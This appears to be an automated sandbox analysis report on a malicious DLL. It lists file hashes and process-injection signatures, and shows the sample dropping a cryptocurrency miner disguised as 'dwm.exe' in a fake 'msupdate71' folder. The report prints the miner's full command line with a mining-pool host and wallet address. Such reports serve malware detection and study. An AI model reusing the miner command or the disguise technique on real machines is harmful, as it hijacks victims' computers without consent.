Analysis
- max time kernel: 179s
- max time network: 182s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-11-2022 20:44
Static task: static1
Behavioral task: behavioral1
- Sample: a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll
- Resource: win10v2004-20220812-en
General
- Target: a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll
- Size: 1.2MB
- MD5: bf52463eb2b43eef8412bda49f2602b9
- SHA1: 8eeedc0baba079bc5811027f043ff034c1173c5e
- SHA256: a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74
- SHA512: bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377
- SSDEEP: 24576:VJPVpkCOvt+H5ZRwLZSblLAxRfbJT6+uEkMIAsTWRsrUVQBB:jIvoRwlSlURfbJrbGAe7LB
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes: PID 4444 dwm.exe
- Loads dropped DLL (6 IoCs)
  Processes: PID 4444 dwm.exe (6 events)
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes (description, PID, process, target process):
  PID 2828 rundll32.exe wrote to memory of PID 4908 rundll32.exe (3 events)
  PID 4908 rundll32.exe wrote to memory of PID 4444 dwm.exe (2 events)
Processes
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll,#1
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -p x -u 42ychz53apvgs3EHMoeAyGQM3pq7EikTLTBu1RaBj8njgVfykF4v8HdPNyzAfDTDUGZfoLjMdh9Wa4u1Bm2t3f7aSFSwS4U.03 -t 16
      - Executes dropped EXE
      - Loads dropped DLL
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
  Filesize: 892KB
  MD5: a76fd14d26b739aa7fe4358c30c1d30e
  SHA1: 0b8f2ec4de56088700409483a5793bd35c85cd9e
  SHA256: cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4
  SHA512: 3b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a
- C:\Users\Admin\AppData\Local\Temp\msupdate71\libcurl-4.dll
  Filesize: 511KB
  MD5: 882a19580596d8e90e1f95ea3320347e
  SHA1: cef622275d69a206d84363ea07b243ab9804d2f5
  SHA256: 7719ddd67ff07beb26bc31d1cf925f278e302e6163e02169ff7dcefcb651e007
  SHA512: ea138d1d53ee183caf4fec9bead1f71517de13fb34be826ab87941830199e2d6b925146fa9461537e86fe2b4ab24556ebc5ca5cee71e25146c02beae26a3a5f9
- C:\Users\Admin\AppData\Local\Temp\msupdate71\libiconv-2.dll
  Filesize: 128KB
  MD5: f4ba452fce20265a52cf629e52764813
  SHA1: 4a1ab11777b65ca77f27a2bce7f3ea1d3d4fdda6
  SHA256: 06ccf8536e89ee05801827b56d27724ad4cea84b093165e7153cbbd466e6063c
  SHA512: 8924e5a5ae143ea3a1bf6dadbad0802dfdc86a70edf7cd6d0df4e433d9071a4eaea45a06c5950ecfa9aa5d3df97a113f31aa80c74729f2753e5c38c5c65c24ac
- C:\Users\Admin\AppData\Local\Temp\msupdate71\libiconv-2.dll
  Filesize: 396KB
  MD5: 609151585ff8eb8274165f0b03b99076
  SHA1: 81902816d351a7845a28059baf342b7576c296cc
  SHA256: a61cfb59fbc0f1038f95492a1d0f3560a3e2eec50e6a6ff0f66cedf9cbbd65f2
  SHA512: d5a7d83140638bf447d14cd29197c6bcd71d2dd6b1f6aa9d85388a53ca26f3c4b77bcc57a0f43df7dacca15e2185ee829956429d19a5e649b4242b72961b8318
- C:\Users\Admin\AppData\Local\Temp\msupdate71\libidn-11.dll
  Filesize: 206KB
  MD5: f8a0d5fe3fd8569ed3cac7318cdc493a
  SHA1: 27a82c19abbadff848f86ee9b9ed579c8b1f7b7b
  SHA256: 6e4d69c688b9f318bb497cd7a322df2e5470529880420b783061fa87aa916570
  SHA512: f0328b52a14e9f3d3f72b8f77431bd757ccd5b10d65b5e8d7d67f733e09b23aa6113147cf53a9a0518cb6a4810027e5985ac109b604396cc75abfb35752cf9e0
- C:\Users\Admin\AppData\Local\Temp\msupdate71\libintl-8.dll
  Filesize: 112KB
  MD5: 9650b3149085e7df43acad2703b81fd8
  SHA1: 38d25e33825a67943fb8081a651d854fcdbfdc15
  SHA256: 34618f63fd89c387019f7c061846d318fa98b52c7d9025de093d442f29d4e87b
  SHA512: 4f8eff628f279d9d042801837518d501420a9b8d85771cbe26bc40ded2e5a701d665838e0c672fef8e0e694b4cc853e07364915ae39cc68f6bd96ff3dae5e9e7
- C:\Users\Admin\AppData\Local\Temp\msupdate71\libwinpthread-1.dll
  Filesize: 298KB
  MD5: bb0019619d0e3b013018ba6cbfb6185f
  SHA1: c23b023ac220283b81d98bbdf5ada3e40ab20e60
  SHA256: 4dd3c7262580fb8a03813c249b643d81dd0e5b90e883102a33a5a1d62500132e
  SHA512: 9b2731e63d50b78bf27b680f3ef33b85e68659dadaf9734ccbeb9297370c323e39d13a5b794b705a892203064dad156f6471612cb40415d6d7701347641db0a8
- C:\Users\Admin\AppData\Local\Temp\msupdate71\zlib1.dll
  Filesize: 113KB
  MD5: cb0577e362e193cad14c3d23c40c30d4
  SHA1: 65db52c270bc8f1e9435d95456da9f1e45e74fd9
  SHA256: 9e93a45fb249f32d1aac4e69ce84ceae783782e75148e572fdde3bfe2579121c
  SHA512: 4c1cc231599e0928ae67d1e3493417b35c6185739795b00da8cad6580a44f56df3769d652f8dd1798e762c11e87904bf0624fe6c2392b2e35fba15160959b32b
- memory/4444-133-0x0000000000000000-mapping.dmp
- memory/4908-132-0x0000000000000000-mapping.dmp